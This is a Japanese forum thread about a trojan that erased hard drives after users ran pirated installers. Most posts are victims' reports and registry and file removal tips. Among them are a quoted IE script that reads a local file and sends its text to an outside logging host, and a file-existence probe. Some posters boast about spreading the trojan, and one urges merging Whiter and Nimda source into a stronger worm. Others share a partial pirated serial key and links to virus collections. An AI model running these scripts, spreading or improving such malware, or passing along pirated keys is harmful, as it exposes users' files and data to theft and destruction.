HDぜんぶ消去した上ズタズタに！！ウィルス

遅ればせながら件のウィルスにかかってしまったようだ。しかも2回。
どうやら原因は直前にMXで落としたFinaldataとみてほぼ間違いない。
ただしデータそのものはFinaldataで完璧に復活できた。
OSはWin2k。

>693
ウイルス入りのファイナルデータで、データ復活？

でもウイルス感染したままの状態で復活ってこと？
説明ｷﾎﾞﾇ。

カビキラーにカビが生えちゃったみたいな喜劇だな（藁

FINALDATAは悪魔のtoolです。MXよりｺﾜｲ。お薦めできない。

>>695
ﾜﾗﾀよ

でも、この場合「カビの生えたカビキラー使っちゃった」だな。。

まず、別に必要はなかったが戯れでFinaldataを落としてみた。
いろいろやって再起動したら発症したので、すぐにOSをクリーンインスト。
で、よせばいいのに再びMXでFinaldataを落としデータを復旧、バックアップを取る。
そのFinaldataも感染していたらしく、再起動でまた発症、というわけさ。

もらったカビキラーにカビが生えてそのカビをごまかす為に
カビのカビキラーを使ったらまたカビた????

ゴメソ。意味不明。　

良かったな、いい経験だ

なんだか　DOM防止パッチ2.65　あたり　か
napgaiterだっけ?　この二つのどちらかわからないが実行したら
再起動後　逝きましたわ　HDD　全部　フォルダだけ
で　終了したら　再起動不能....

かなり貴重なファイルやメール、お気に入り.....
いままでの環境を再構築と考えただけで最悪です。

みなさん、気をつけてください

NortonGhost2002 日本語版　要注意

>>702
もうちょっと詳しく…

中身は 2001です。readmeみると2001と記述してあり、
で、もしかしたら中身は2002かななどと思い
ウィルスチェック後、共有ファイルが偽物じゃ悪いと思い
中身確認のためインストーラーをちょっとでも起動したりするとひっそりッドスネークします。
気づかずに再起動後した場合、あなたのminePCは　白痴になります。

千と千尋の　顔なし　が　急増中
金が土に変わる前に活用するべし....

>>704
とてもウィットに富んでますね。何かいいことでもあったんですか？

>>705

べつに . . . .

>>704
なんだか詩人ですね。
もっと詳しいレポート希望。

今しがたWinSvc.exeにやられた。
うおー！データパーティションが空だぜー。
全滅はまぬがれたが
MSCONFIGしとけよ俺。

ハイテンション欝。

これはどうですか？
http://makaroni.free-city.net/index.html

>709
氏ねやヴォケ

>>709
マルチポストしまくりだな。
まぁ二度とここ読まないだろうけど。

なっち…
Finaldataに助けもとめて
さらにそれでまたやられると
ダメージきついな。

ＷiｎＧrooveの他にFileVisorとかもやばくないか？

と言うか俺も8月ぐらいにHDDのデータ吹っ飛ばされたよ。

症状は同じ。フォルダ残して真っ白。
まぁ、Whiterの仕業とわかっただけでも良かった。

ちなみに俺のときは確かATOK14だったかな？
それ開いた瞬間にDOSが起動してOSハング⇒再起動⇒撃沈
OSが2000だったからなんかおかしいと思ったが割れ物だしあんまり騒げなかったので鬱だった。

ちなみに吹っ飛んだデータ　40GBのHDD×2=80GB.....。

吹っ飛んでから2週間は立ち直れなかった・・・。

二度と体験したくは無いな・・・。鬱

>>704
もっと詳しく

>>713
俺は６０G+６０G+ネットワーク上の６０G+６０Gで
２４０GB飛んだよ。ショックだった・・・・

guest　guest　

うお〜いっ！！さっきファイル確認してたら
whisterとwhistler発見した！
ファイルの名前は
Adobe Premiere6.0とウインドウズＸＰ
既出だったらスマソ！

２８日に感染しました。
ＭＸでインターネットサムライを落として、起動。
フリーズ→再起動後ＨＤＤのアクセスが異常にあった。
１の通り、フォルダを残して中身は空っぽ。
program filesだけは無事。
卒業論文のデータがあぼーん。
鬱氏。

Norton Utilities 2002J(fcd).zipってのを解凍したら
Download4\NortonUtilities2002当該{語版\NortonUtilities2002日本語版
という具合にフォルダが作成されて、フォルダが消せない症状が出ました。
（リネームも何にもできない）
その後、再起動でHDDあぼーん。

ノートンはインストールしてないのにトロイ仕込まれるのって
あるんでしょうかね？

WinSvc.exeを調べてみたところ、奇数月の13日にHDD全消去プログラム
が作動すると書いてあったが、↓
http://japan.ahnlab.com/virusinfo/view.asp?seq=85&pageNo=5

俺が被害にあった日は12/29でした。
亜種かな。

つーかMXで逮捕者が出た今でも、アプリを共有している無謀な奴はいるんだねぇ。

すいませんが、質問お願いします。
友達がWinMxを使ってDLしまくってると言ってるんですが、私はやばいからやめとけ、
そういったのですが、「大丈夫、DLはいいんだよ」といってるんです。
DLしても大丈夫なら、私も試してみようかと思ってるんですけど、DLするのは危ないんでしょうか？
ちなみに友人は曲メインで落としてるらしいです。

>>722
スレ違いです。MXのスレに行きましょう。

>>722
共有するのが公衆送信権というのにひっかかってﾀｲｰﾎされる。
共有無しで落とすだけなら大丈夫だが、DOMで低速回線ならMP3でも弾かれるよ。

WinRAR 290日本語をDL。
添付のテキストに丁寧に書かれていた通りにインストール。
見事にWhiter埋め込まれて次の起動でHDのデータ全部あぼーん。

自分で買ったCDRドライブについてたWinCDRのCDを無くしてしまったので
昨日落としてインストールしました。
ver6.0です。　今このスレを今はじめて見てすごく怖くなったのですが
再起動しても消去されてなければ大丈夫でしょうか？

WinCDRはマジでヤバイ！俺の友達もやられた。特に６が危ないそうな。
ウィルススキャンしてみ。
あとStartStop入れて数日は確認しないとね。

Symantec
http://www.symantec.com/region/jp/securitycheck/

StartStop
http://www.tfi-technology.com/startstop.htm

数日後にあぼーんってこともあるらしいよ。

まじっすか？普段割れなんてしないのにCD探すのがめんどいって理由で
唯一落としたのでヒットか？
Whiterって単語を検索したところなかったんだけどやばい？
寝れねーー

>>728
とりあえずオンラインスキャンしてみる

今のうちにバックアップ取っとけ。

最近じゃ何にでも入ってるよ＜ウィルス

Symantecでオンラインスキャンして問題なければ大丈夫ですかね？
今途中なんですけど

今スキャン中なんですけどすでに感染ファイル１って出てます・・・

ここはMXやってる奴が自分の自業自得を語るスレ？

レジストリを見てあやしいスタートアップが無いか確認すれば良いじゃん。
単にそれだけの話。意味も無く怖がるな。

>>736
レジストリじゃなくてもmsconfigであやしいスタートアップがなければ大丈夫？

2度と再起動しなければ多分大丈夫！

ぜんぶ隠しファイルにしとけば多分大丈夫！

たいへんねぇ。

はにちゃんねるをよろしく。
http://www.isn.ne.jp/~honey/hc/

>>737

君、ニュータイプじゃなようだね
いつも、スカウターをつけてるようだし。
電子レンジにでもなっちまえ!!

　　　　　

>>742
ふん!　おまえは所詮、ニュータッチ　の箱売り娘。

Virtual PC使えばいいじゃん。前イメージをコピーするだけで復旧できるし。
最近は Virtual PC自体にウイルスがついているので体験版を落としてきて
パッチを当てるのがお勧め。

もっとも、Virtual PCが一番役に立つのは 自作のウイルスの実験台
にする場合だけどな(BIOS破壊は除く)。

やっと流行おくれのTROJ_WHITER.Cを入手しました。
クリスマスプレゼントは、できなかったけど、
お年玉は、みなさんに差し上げます。
来年も良いお年を・・・

あけましておめでとう！
オイラも、いっぱいバラまいちゃった。
一富士、二鷹、三なすび、起きてビックリ玉手箱になるでしょう。

>>745-746
(　´_ゝ`)ﾌｰﾝ

745と746が捕まった時の顔といったら･･･(ﾌﾟﾌﾟ

ウイルスを自作できる744も危ないヤツだな！
自作できないワシは、コレクション専門だ。
30種類以上集めたが、ほとんど古くて使いもんにならん。
今のところ「W32.Whiter.Trojan」の亜種が最強だな。
ウイルスって、検索すれば簡単に見つかる。
ここに来た人の中にも、入手しているヤツが、かなりいるハズだ。
不況が、犯罪をネズミ講のごとく広めている。

再起動の前にレジストリーをみるべしと書いてるけど
どこをみればいいの？

ていうかこのスレに載ってるし。俗に言うガイシュツってやつだ、君。

ＰＣに詳しくないからわかんないんだよ
例えば　c:\WINNT\system32\whismng.exe　でＰＣ内を検索とか
する事なのかな？

http://www.ebcvg.com/vx_exe.html

リンクをたどるとまだたくさんある。

>>753
おお！サンクス。
ちなみにWhiter欲しいんだが見つからん．．．

見つかれば教えてください。
「W32.Whiter.Trojan」と「ニムダ」が合体したようなウイルスは？
つまり、メールで伝染させてハードディスク全消去してしまうウイルス。
きっと、あるはずだ。　ほしい・・

>>755
そんなウィルスがあったらおそろしすぎる。
でもありえなくはないんだよな…
(((( ；ﾟДﾟ)))ｶﾞｸｶﾞｸﾌﾞﾙﾌﾞﾙ

かなり執拗に捜査されるだろうね。
捕まって名前晒されて祭り。
損害賠償とかも大変そう。

ウイルスバスターの尻おせーて

ω

サーカムだよそれ

スマソ。マチゲータ。昔のはなししてたと思って待った

>>758　ほれ
SJF-9999-7385-8479-9082
ただし、最初の一文字が抜けてるよ　自分で探そう！

>>755
あのなぁ。
W32.Whiter.Trojanとニムダ手に入れてソース見ればいいだろ？
改造の具合によっては最強の物ができるぞ。

おれもニムダの変種を作ったことがあるが、そのまま流用したんで
ウイルスチェックに引っかかってしまった。まだまだですな。

エボラウイルスはすぐに発病して被害も大きいから一時的には大惨事に
なるけど逆に人類に絶大な被害を与えることもないそうな。
エイズウイルスは潜伏期間が長いので

「MX 落としてはいけない物リスト」のサイトは、
閉鎖ですか？　それとも更新中ですか？

ちゃんと　ありました。

漏れも昔やられた。ＭＸは入れてたが何でなったかはわからん。
起動できなくなったのでスキャンディスクをかけたところ、
３３バイトのFile****.chkや、Dir****というディレクトリが作られてた。
結局このファイルを修復する方法はないの？

画像ファイルがすべてなくなりました。二日前くらいに。
それに気付いて他にも確認したんですがどうやら画像のみの被害でした。
フォルダはそのままのこっていました。空のですけど。
そのときにはまだ動画ファイルはちゃんとあったと思います。
メールは確認してませんでした。
オンラインスキャンもしましたがなにも検出されず、ウィルスではないのかな、
とおもっていたら次の日、今度は動画ファイルがすべてなくなっているんです。
「昨日はあったのに！」と思い、またスキャンしたけどなにもなしでした。
いままでのメールも全部なくなってしまいました。なにが原因でしょうか？
数日前からパソコン起動後（１分後位）にＦＤＤのアクセス音がきこえました。

>768
おそらく「Wininits.exe」の仕業ではないかと。
「初心者質問スレッド」の450あたりからその話題が出ています。
応急処置は
http://pc.2ch.net/test/read.cgi/sec/1008322606/475
で。
はい、あのスレの464です。

スタートアップ監視ソフトの正式名称、忘れた・・・
「Start and Stop」で合ってたかな？

>>769
「.exe」で検索したらそれありました。
でもテキストファイルはのこっていますし消えたのは
画像、動画、メール、htmlファイルなどです。
画像ファイルにもいろいろありますが、残ってたのはPNGのみで
あとは全て消えました。動画もMPG(?)とavi,が全部消え、残ったのは
MP3,ASF,rmなどです。メールはOutlook Express へようこそだけ、
というよりは初期化？されたかんじです。
いまさらなにがなくなっても驚きませんが原因がわからないと
また同じことですので。
応急処置はしませんが、そのうちリカバリＣＤで最初からの状態にします。
みつかったexeファイルは削除しちゃいました。これはもう根付いているんでしょうか？
なにかわかったら教えてください。

>>768
うちと似てるかも。
やっぱり数日前からＰＣ起動１分後位にＦＤＤにアクセスしてたし。
あとＷＩＮが立ち上がった瞬間に電源がいきなり落ちたり、起動した直後にＨＤにアクセスしたまま
固まったりちょっと挙動が怪しかったんでウィルスを疑って全ドライブスキャンしたけど異常は無し。
リカバリする事にして、ファイルのバックアップをしようとしていた矢先の事でした。
ハードディスクの空き領域がやけに増えていたんですよ。
データを保存してた場所は Ｄドライブ内に MyDocuments と Desktop、Ｅドライブ、Ｆドライブ。
調べてみるとMyDocumentsとＥドライブで空のフォルダを残して jpg gif mpg avi txt html がごっそり
なくなってました。残ってたのは mov mp3 rm png psd mht アーカイブファイル等です。
ここ見る前にリカバリしちゃったんだけど、これも「Wininits.exe」の仕業ですかね？

>771
http://pc.2ch.net/test/read.cgi/sec/1008322606/601-700
このあたりでも（616以降）話題になってる。
案外、深刻なんじゃないのか？静かなブームになるかも。

c:\WINDOWS\Temporary Internet Files\Content.IE5\OX2NGTIZ\l50[6] は 次のウィルスに感染しています： JS.KakWorm.Z
どうすりゃいいのさ？

<!--ipt
a=GetObject("c:\\test.txt","htmlfile");
setTimeout('window.open("http://tarikihongandou.shadowpenguin.org/WinSec/tarilog.cgi?name=test&chat="+a.body.innerText);',2000);
</scri-->

なにこれ？

>>774
ああ。
グニンスキーちゃんの見つけた最新バグ
IE GetObject() problemsね。
しかし、あのオッサン（？）良く見つけるね。。。
>>775
一回、本人のサイト探して逝ってみると良いよ。
少なくともマイ糞TechNetよりは為になる（ｗ
・・・IP晒してろぐる事ないぢゃんかよぅ。。

>>774
ああ。
グニンスキーちゃんの見つけた最新バグ
IE GetObject() problemsね。
しかし、あのオッサン（？）良く見つけるね。。。
>>775
一回、本人のサイト探して逝ってみると良いよ。
少なくともマイ糞TechNetよりは為になる（ｗ

・・・これ、ログってんの？？IP晒す事無いと思うけど。。

なんてこった。。
間違いカキコでラッキーNoゲット。。

http://pc.2ch.net/test/read.cgi/sec/994847789/173-182

An example of the malicious code has been provided by Georgi Guninski <[email protected]>:

a=GetObject("http://"+location.host+"/../../../../../../test.txt","htmlfile");

http://www.securityfocus.com/cgi-bin/vulns-item.pl?section=info&id=3767

http://www.securityfocus.com/bid/3779

<html>
<head>
<script language="javascript">
<!--
var fileExists = false;
function yes()
{
alert("the file exists.");
yes = true;
}

function no()
{
if(!fileExists)
{
alert("the file does not exist.");
}
}

window.onerror = yes
window.onload = no
//-->
</script>
<script language="javascript"
src="file://c:\autoexec.bat"></script>
</head>
</html>

>>769
"StartStop"ね。ググルで検索すれば一発で見つかるよ。

>783
感謝です。

>782
サンクス！　上の783のぶんまで感謝します。

VMWare3.0 でHDD逝きました。
確か容量が13M以内だったと思います。
インストール直後はいいのですが
インストールが終わって再起動します。
そうすると、HDDが徐々に削除されていきます。
ネットワークに共有を加えている方は、
そのファイルまで消えます。
フォルダだけ残してすべて・・・・・・・

皆さん気をつけてください。

漏れの４０Ｇのファイル達がぁぁぁぁあ！！
ＣＰＵ早かったせいか・・・１分程度で消えました・・・・

だからVMwareはオフィシャルサイトから落とせるっつーの。
わざわざMXで落とす奴がバカ

786>
MXとは一言も言ってないと思われ・・・・

ではオフィシャルサイトで配布してるVMwareにWhiterウィルスが感染してたと?

知り合いからいただきました。

ならその知り合いを頃しちゃいましょう。

ちょっとスレと関係ないんですけど､
RMファイルって見てるだけでブラウザを任意のサイトへ
飛ばすことって出来ますよね？
実は有料サイトの動画を見ていたら､勝手にブラウザが
そのサイトのトップページに飛ぶのですが､
これは、ウイルスへのリンクとかブラクラへのリンクを
仕込むことが可能ということですよね？

年末にトロイにHDDをずたずたにされたおかげで心機一転再フォーマットしたら
不良クラスタが減ってしまいました

>>791
できるね。
ちゃんとIEのセキュリティパッチをあてておかないと危険

ﾖｼ!
ｺﾚﾃﾞﾏﾀfinaldataｶﾞｳﾚﾙｿﾞ
ｲﾋﾋﾋﾋ

↑てことはないよね。

だってWhiterで破壊されたファイルはFinalDataで復旧できないじゃん。

ﾊｧ?

>>797
ﾊｧ? 、とか言う前に、このスレ全部読んでみたら？
わかってないの君だけ。

ﾌﾟｩ?

age

マァマァ、落ち着けよ

（ﾟДﾟ）ｳﾎﾞｧｰ

先生我々は遂に
ｱﾌｫの797をﾊｹｰｿしました。
がなにか

わたしもやられました。
・まず、年末にｈｔｍｌファイルがすべてなくなっていた。
・ＦＤへの意味不明のアクセスが毎起動時にあり。
・今年に入って、ＧＩＦ、ＪＰＧの全消失。
・ＭＰＧ、ＡＶＩの消失。
・ＨＬＰファイルの消失。
・ＳＣＲ（スクリーンセイバー）の消失。
リカバリーディスクで、購入時の状態にもどしましたが、
痛い。

去年某[k]サイトのリンク先にあったFinalDataEnterpriseを
拾ったんだけど､これCD-ROM版らしいんだよね。
autorun.infとかautorun.exeとかあるんだけど。

これヤバイの？
総ファイル10,047,341バイト。
尻無いから単なるコレクションだが（ｗ

こんなスレがあったのか。
当方も被害に遭いました。

あ〜あ

年末にハードディスクを買い換えたところで
それ以前のデータは前のＨＤＤに残したままだったので
まあ、被害は少ない方だと思いますが。

ちなみにDriveImage2001 for CD-Rだったと思います。

　　　　　　　　　　　

>>788
VMWare3.0ユーザです。
サイトで評価版ダウンロードして正規にレジストしました。
インストールしてから２ヶ月以上経つけど問題なく動作中。

先週末、海外のエロサイトを回っていたら、突然ハードディスクにアクセス
されてしまった。そしたらハードディスクの中身が急激なスピードで削除されて
いきました。とっさの判断でＰＣのリセットボタンを押し、そして再起動と
同時にリカバリーディスクでクリーンインストールしました。

同じような経験された方、他にもいますか？

>>810
JavaとActiveXの設定はどうなってる？

>>811さん

JavaとActiveXって名前しか知りません。どのように設定すればよいのですか？
それでもって、ついでに私のハードディスクの中身が削除された原理を教えて
いただけませんか？

Autoexec.camてなんですか？

>>812
その様子だとデフォで閲覧してたのね・・・

>>814さん

恥ずかしながらそうです。だから私の疑問について返答して
下さいませ。

>>815
とりあえず　↓ここでチェックしてみては？
ttp://inetsvr3.nicnet.co.jp/test/chkVM.asp

汚染を除去しました。

shl.RegRead("HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\
Services\\Tcpip\\Parameters\\Hostname");
if(0 < s.length){
alert("[危険] ホームページ側から、"
+ "自由にレジストリを読み書きしたり、"
+ "ファイルを削除したりすることができる状態です。");
if(confirm("[危険] 試しに、"
+ "レジストリからコンピュータ名を"
+ "読み出してみてよいですか?")){
alert("[危険] "
+ "レジストリからコンピュータ名を読み出してみました。\n"
+ "コンピュータ名は 「" + s + "」 ですね?\n\n"
+ "レジストリを読み書きできるということは、"
+ "コンピュータの設定を自由にあやつることができるということです。\n"
+ "非常に危険な状態です。");
}
}
}
catch(e){
}
}
setTimeout("attack()", 3000);
// -->
</script>
<applet width="1" height="300" code="com.ms.activeX.ActiveXComponent">
Applet: com.ms.activeX.ActiveXComponent<br>
(この文字が表示されているブラウザは、問題ありません。)
</applet>

<h2>[危険] と表示されたら . . .</h2>
<p>ただちに対策を行いましょう。 そのままにしておくと、Web ページを見ているあいだに
Windows を使用不能にされてしまう可能性があります。</p>
<dl>

>>816 のリンク先のさらに幾つかリンクがあるから、
そこも読んで勉強してね。

>>814じゃないけど さん

ご丁寧に書いて下さってどうも有り難うございます。それではそのサイトに行って
勉強することにします。

>>810
とりあえずIEを使っているなら今すぐすること
IEのバージョンアップしてここで修正プログラムインストールね。
http://www.microsoft.com/japan/enable/products/security/
次にIEを立ち上げてブラウザの一番上の段のメニューバー
ツール＞インターネットオプション＞セキュリティタブ＞で「高」にしてブラウンジングする。
「レベルのカスタマイズ」ボタンを押せばわかると思うけど
それであくちぶXとか無効になってるでしょ。

あとはセキュリティ高にしてると見れないサイトも出てくるけど
その度にいちいちインターネットオプションを出すのがウザイなら
タブブラウザが便利と思われ。
タブブラウザは色々好みが分かれるけどツールバーボタンからの
セキュリティの切り替えが一番秀逸だと思うのがこれ
http://pc.2ch.net/test/read.cgi/win/1011191549/l50
お気に入り・ブックマークの移行
http://www6.plala.or.jp/downward/MDI/help/html/first_import.html
とかヘルプもあるし色々試してみるとヨイ。
んでオミトロンhttp://pc.2ch.net/test/read.cgi/win/1010675673/l50
入れたりしたら。

MXのfinaldata使ったら消されてしまった…。
ファイナルデータで復旧出来るかどうかわからないからMXでまた落として
来たけど(懲りない奴)どうなんかな…。
既出なら悪いけど、安全なファイナルデータとかわかります？
ｴﾝﾀｰﾌﾟﾗｲｽﾞ版10572681ﾊﾞｲﾄなんだけど。

直せるならちゃんとNTFS版ﾊﾟｰｿﾅﾙ買ってくるから、直せるかどうかだけでも知りたい。
(お試し版ではファイルは出てくるんだけど…)

お前もカビキラーにカビ生えちゃったパターンか…（藁

ﾅﾝﾀﾞﾄｺﾞﾙｧヽ(`Д´)ﾉ

って、よく見たら違う板だったのね…板違いｽﾏｿ
(他板から飛ばされて来た)

>>822
だから復旧できないって。
過去ログくらいよめ！

>>822
俺も同じのでやられたぞ。
オーバークロック試してたらドライブ見えなくなってしまったので、
MXでFainalDataのエンタープライズ落としてきて復旧作業してたら別ドライブのデータ見事に消されてしまった。
でもインストーラーにウイルスくっついてるだけのようなので
レジストリエントリ消して、windows\system32\winsvc.exe消してそのまま使ってる。
落として来たZIPは消しちゃったからサイズ分からんけど。
で、データサルベージの件だけど、俺の場合はファイル見えても全部33バイトになってて使えなかった。
1ヶ月前にバックアップ取ってあったから、被害はここ1ヶ月のお宝画像だけだったけどな。

そのウイルスﾎｽｨｰ
なんて名前？

>>828
http://www.google.com/search?q=winsvc.exe&hl=ja&lr=lang_ja

>>825
板＆スレ 誘導は悲しいかな確かに合ってるぞ！！

winsvc。
MXで持ってる人居ない.....。

http://www.geocities.co.jp/SiliconValley-Bay/4070/yume.swf

>>826
関連スレと過去ログ100まで読んだが…。
８年使ってきて初めて食らったウイルスがこんなまぬけなものだとは。
ＭＸなんか久しぶりに起動したのに。ヽ(`Д´)ﾉｸﾔﾁｲ!
バックアップなんかかけらもとってないからあっさりオールクリーンだよ。
移行にゃ丁度よいか…。

とりあえず、どうせもう消えちまった事だしウイルス付復旧ソフトで
見てみるとするわ。
>>830
一応ＭＸ関連は板違いｸｻｲんで
>>831
600ﾒｶﾞのエロ動画となら交換しちゃろか？(笑

202.221.45.130

俺のIＰアドレスだ、おめーらの技量じゃハックデきね〜だろうけどｗ

(ﾟдﾟ)ｳﾏｰ 持ってねーか？

つーか、落ち着いて過去ログ読んだら症状そのものじゃん(；´Д`)
冷静になれず糞レスしてしまって申し訳ない。
今頃かかるなんて(ﾟдﾟ)ｱﾎｸｻｰ

でも壊れたファイルをフォーマットする意気地がないんだけど…。
落としたエンタープライズ版は98/Me用だから使えねーし諦めがつかん…。


しかしまあ、今までウイルスに食らった事なかったし、バックアップもTOWNS時代に
フロッピーでｾｺｾｺやったっきりで数年しなかったんで、これを教訓にするか…。

ウイルスと無縁と思ってる奴が泣きを見るって煽り半分で上に書いてるけど
まさにその通りですな(泣)


良スレageヽ(`Д´)ﾉ

正直言ってファイナルデータって復旧出来なくない？
例え取り出せても、アプリのexeが起動しないし。

そろそろこのスレも使い切ってしまいそです。
どなたか今までのまとめを発表してもらえないでしょうか？
原因・結果・対策・

結論:MXには手を出すな。

>>837
このウイルスは、複雑な消し方をしているから復旧できないだけ。
普通に消したり、フォーマットしただけならば復活できる。

わしもやられるまで「こんなん引っかかったらオワリだな」と
みんなで言っていた翌日やられた
気を抜いてPCやってはいかんと思ったよ

ACCSが流してんじゃねーかと勘ぐってみたり

おまえ〜、それはないだろう〜　（流行ってるギャグ）

そんなこたぁ　ないでしょう。（某ゲームメーカーN社から某MS社に移った広報：Hさんの言葉）

仲間がいるのか？
俺は今朝午前３時に
HDD50GB全部逝ったよ。

再起動した直後じゃないのに、
いきなり発動して。

オンラインウイルススキャンもすべて引っかからず。
もちろんFINALDATAも役立たず。

211.56.136.183　　
こいつが毎日ウィルスを送ってくる・・・。

>>849
http://www.soft4ever.com/security_test/En/index.htm
からyalta.zipを落とす。適当なフォルダへ解凍後 yalta.exe を起動、

Target IP Address:そいつのIPアドレス
text to send:ウイルス送ってくんなヴォケ！（←韓国語で）

これを各portへ向けて Leak Testで送ってみよう！
ひょっとしたら読んでくれるかもしれないよ。

>>845
もっと詳しく情報きぼんぬ

>>849
ウイルスを送ってるってどうして分かるのでしょうか？
教えてﾁｬｿでｽﾏｿ。

>>851

いきなりWordXPに何かエラーが出だして、
再起動したらHDDがフォルダだけ残して
からっぽに。
FINALDATAでのぞいてもすべてのデータが33バイトに。

ただ、この症状のウイルスに亜種が多いみたいで
どれかは今だ分からず。

とりあえず、ウイルススキャンでは発見できず、
何回も再起動してても何の症状も現れず、
いきなり発症した。

「落としてはいけない物リスト」作者です

こちらでもmx関連の話題が多いようなので、念のため貼っておきます。参考にしてください。
（このスレ＋Download板のトロイスレ1〜3の情報をコピペしてあります）

　http://www.clickjump.net/mx
　http://mxtrojan.tripod.com/
　http://www.geocities.com/mxtrojan/

（私はすでにmxからは引退した身なので、次回更新は未定です）
中にはネタ情報が含まれているかもしれませんが、、HDD全消去には気を付けましょうです・・

>>854
にいろいろあげてくれているようなんだけど
当方、「DriveImage for CD-R」でやられたんで
追加しておいてほしいな、と思った今日この頃。

>>855
俺も昨日HDDがふっとんだところなんだけど、
ウイルススキャンにはかからなかったよね？

いやあ

警戒なんかしてなかったんで
そのままインストール→HDD消去ですよ。兄貴

>>857

まあウイルススキャンにはどうせひっかからないらしいから
一緒だけどね（ｗ

俺は時限式で急にドカン！！（ｗ
再起動してすぐに発動ならアプリ特定出来たんだけど・・・

WAREZに仕込まれてるトロイやウイルスじゃ発見駆除ツール業者に報告するわけにも行かないから対応はなしか？

>>859
案外、これらのウイルスはソフトメーカーが仕込んでいたりしてね。

そして伝説へ・・・

スタートアップで確認できるんじゃなかったの？？？

>>862

OSを終了するごとに毎回確認するなら大丈夫な気がする・・
アプリのインストール後だけなら時限式には対応できないような。

そのウイルス持ってねーか？

時限式・・・・ｺﾜ

「W32.Whiter.Trojan」　症状と対策
症状：OS起動後(ログオン後）、HDDに激しくアクセス。デスクトップのアイコンが
消えたり、使用中のソフトにアクセスできないというエラーが出る。フォルダのみ
を残して全ファイルが削除されている。ネットワークドライブに割り当てられている、
LAN上のドライブも同じように削除される。OSを終了すると二度と起動しない。
修復ソフトなどでファイルを復活させるとすべて33バイトになっており、
事実上復活不可能。


原因： Whiterウイルス＝インストーラー等に仕込まれており、知らずに実行すると
感染する。このウイルスが -next のコマンドライン引数で実行されると、
ファイルサイズを0バイトにしたあと削除するため、フォルダのみを残し全ファイルが削除される。
Adobe製品やLightwave、エロゲなど、感染源多数。


対策：インストールした後(必ずOSを終了する前)、レジストリの以下のキーを調べる。
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
ここに
Whistler %System%\whismng.exe -next
という記述があればすでに感染している。すぐにそのキーを削除すればよい。
別の方法としては、システムフォルダ内にwhismng.exeがないか調べる。
あれば削除、もしくは別の場所に移動する。ただし名前を変えられると
この方法は使えない。OSを再起動してからでは手遅れになるので注意。
また、ノートン先生はこのウイルスを検出できるらしい(未確認)。
参考ページ　http://www.symantec.com/region/jp/sarcj/data/w/w32.whiter.trojan.html

ｺﾘｬｺｴｰ

何がどうあれ、コレでOKやろ。
http://www.puchiwara.com/hacking/
なぁ、諸君。

とりあえず厨房サイトの宣伝やめてくれ。

>>853
そのXPが拾い物だったっていうオチじゃないだろな(;´Д`)

>>870

ハハハ。
そのWordは売ってるやつなので大丈夫。

ガイシュツだったらすまん。
「レジストリとスタートアップを確認して電源を切る」専用プログラムを用意。
で、電源切るときにはその専用プログラムを使って切るようにすれば
問題ないんじゃないの？
（もちろん新種・亜種には対応しにくいが）
ダメな理由があるんなら教えてくれ。
そういうプログラムを作ってみたい。

要するにインストーラが必要ないものには関係無いって理解でいい？

>>872
＞そういうプログラムを作ってみたい。

ｶｺｲｲ!!

>>874
2ch初発言でこんな嬉しいコメントもらえると思わなかった。
ありがとう。

アイディアだけでプログラム自体は簡単なはず。
ここを見ている方の中で。VBscript使える人いない？
（その前にVBscriptで電源offって可能なのか？）
このウイルス限定ならおそらく20行もあれば書けない？
ここに張り付ければみんな使える

レジストリではなくファイルで検索として

c:\windows\system\whismng.exeファイルが
有り→W32.Whiter.Trojan 疑惑の為電源off中止
無し→電源off

だけだよね？

欲しがっている人がいるんなら
vbsちょっと勉強すっかなぁ

※コピーユーザの方を守るために作りたい訳ではない。
（一応ソフト作って食べている者だから。mxも使ってないし）
ただ「全部消す」ってやり方が私にはど〜しても気に入らない

うぁ・・・漏れもやられたYo・・・鬱だ氏のう・・・
メールで来たっぽい・・・ノー�d先生何も教えてくれなかった（；´Д｀）
125GB全部パーに。バクアプ取ってなかった。。。
FinalDataも使えん。エンタープライズ版ならできるのかなぁ・・・
しばらく、立ち直れない・・・

>>876
詳しい情報キ・ボンヌ。

ここでHD消しちゃった人見てると微笑ましいよ
俺なんて故意に感染させたとき以外は一度もウイルス、トロイにかかったことないよ
メール添付型ですらね。

何のソフトだったか忘れたけど、いかにも怪しいファイルがあって、
付属の説明文もあやしい解説不足なやつだった。
感染しないだろうとか感染しても被害なんて無いよなんて思いながら起動したら
インストーラーみたいなのを吐き出して、
何だろうと思ってインストさせたら十個近いファイルをインストしたらしい動作。
フリーズしたので何の疑いもなくいつもの再起動
。。。と思ったらデスクトップからありとあらゆるアイコンが消滅（藁
再起動させれば直るかと思って再起動させるとあらゆる動作を許さないように
起動時にツールバーやエクスプローラー（システム内部の方のやつ）を
一切起動できないようにしてあった。
おかげで起動後はデスクトップとポインタだけだった。

結局とある方法でそれらの原因となるファイルを消して何事も無かったかの様に今に至る。
損害ゼロ。あると言えばどうしようか考えた時間くらい。

楽しい一日でした

>>876
もっと詳しい情報書いてください。
MXとか割れ物はやっていませんか？
それなのに消えたんですか？

>>878
コピペ？

俺もやられたよ……60GBが全滅……鬱だ……。
MXだよ、MX。確かここ数日はいくつかの小ファイルを落としてたから
それらだと思うけど。FINAL DATA使っても復活できたのは殆ど無か
った……。

ただ、CD革命に入れてたFCDだけは無事だった。まだ試してないけ
どちゃんと使えるっぽい。なんでだろ？　CDと認識されて消されんか
ったんかな。

結構、やられている人多いんだね。
俺もやられた。

インストールしようとしたアプリは、特打英単語470点。
インストーラを起動すると、ＨＤＤが激しく動き出して全てのデータが消去！！
ちなみに、AVG AntiVirusには引っかからなかった。
初めて感染したので、ショックと衝撃で笑うしかできなかったよ。

今、再セットアップが終わったところ…。
いい教訓になった。

>>877
ドライブにマウント中のFCDファイルは消せない
マウントしてから手動削除を試してみればいい

MX落としたEXEファイルなんて怖くて実行できません。（一度やられてるし）
動画とか、画像とか、音楽とか、そういうのにとどめておいたほうがいいよ。
ソフトは買うのが一番安心。

ゲームデータで騒ぐ奴がわからねえ

＆age

>>884
ゲームデータって何？そんな言葉無いぞ。

>>875
意外とこういうレスから有能なプログラマが生まれたりするらしい
ｶﾞﾑﾊﾞﾚ

>>883
動画もやばいらしいよ。

>>872
漏れも WSH 多少使っているので作ってみるよ。

>>888
飯島愛のあの噂でしょ？
あれはasfの拡張子がmpgと書き換えられていて、
メディアプレイヤーのホールを利用したやり方だね。
でも今はそのホールは無いし、そもそも動画をメディアプレイヤーでは
再生しない。

>>890
>そもそも動画をメディアプレイヤーでは
>再生しない。

何で再生してんの？

>>891
